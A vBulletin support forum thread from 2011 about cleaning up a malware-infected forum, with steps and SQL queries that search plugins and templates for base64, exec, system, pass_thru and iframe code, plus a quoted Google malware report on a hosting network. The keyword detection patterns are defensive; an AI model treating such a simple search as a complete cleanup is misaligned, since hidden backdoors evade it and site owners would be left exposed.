Malware removal services - anyone used them before?

**Wayne Luke** · Mon 12 Dec '11, 8:20pm

Never used them and wouldn't do so.

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

4) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

6) Run this query:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

**whitey10tc** · Mon 12 Dec '11, 8:35pm

What Wayne suggests is the easiest/cheapest fastest way.
Now If you check out the report on your site, it shows a high amount of sites on your host being attacked. I assume you're on shared hosting, I would "make" the host take care of it quickly! or move to a better host. I'd move to a different host if they even hesitated on helping.

Diagnostic page for AS29550 (SIMPLYTRANSIT)

What happened when Google visited sites hosted on this network?

Of the 25831 site(s) we tested on this network over the past 90 days, 715 site(s), including, for example, "links removed" served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2011-12-12, and the last time suspicious content was found was on 2011-12-12.

Has this network hosted sites acting as intermediaries for further malware distribution?

Over the past 90 days, we found 29 site(s) on this network, including, for example, "links removed", that appeared to function as intermediaries for the infection of 70 other site(s) including, for example, "links reoved".

Has this network hosted sites that have distributed malware?

Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 33 site(s), including, for example,"links removed" that infected 78 other site(s), including, for example,"links removed"

**IceFanatic** · Tue 13 Dec '11, 6:35am

Originally posted by whitey10tc

What Wayne suggests is the easiest/cheapest fastest way.
Now If you check out the report on your site, it shows a high amount of sites on your host being attacked. I assume you're on shared hosting, I would "make" the host take care of it quickly! or move to a better host. I'd move to a different host if they even hesitated on helping.

How do you run this report? I too am having malware issues at the moment...

**whitey10tc** · Tue 13 Dec '11, 10:42am

Originally posted by IceFanatic

How do you run this report? I too am having malware issues at the moment...

In the OP's case, last night google was showing an attack page warning with a link to the info. Short of that you can find more info on the malware issue your having in googles webmaster tools. To cure it try what Wayne suggests above.

**04wayne** · Tue 13 Dec '11, 10:44am

My host is basically refusing to help, as their malware scanner isn't picking up any errors.

**Wayne Luke** · Tue 13 Dec '11, 11:50am

Originally posted by 04wayne

My host is basically refusing to help, as their malware scanner isn't picking up any errors.

You'll need to open a ticket then.

**aussiefooty** · Tue 13 Dec '11, 11:57am

Malware removal services - anyone used them before?

Have you tried avg that is free anti virus software? That will stop malware from happening.

**Trevor Hannant** · Sun 18 Dec '11, 4:03am

Originally posted by carntheroos4eva

Have you tried avg that is free anti virus software? That will stop malware from happening.

Can that be installed on web servers?

vBulletin 4 End of Life

Malware removal services - anyone used them before?

[Forum] Malware removal services - anyone used them before?

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment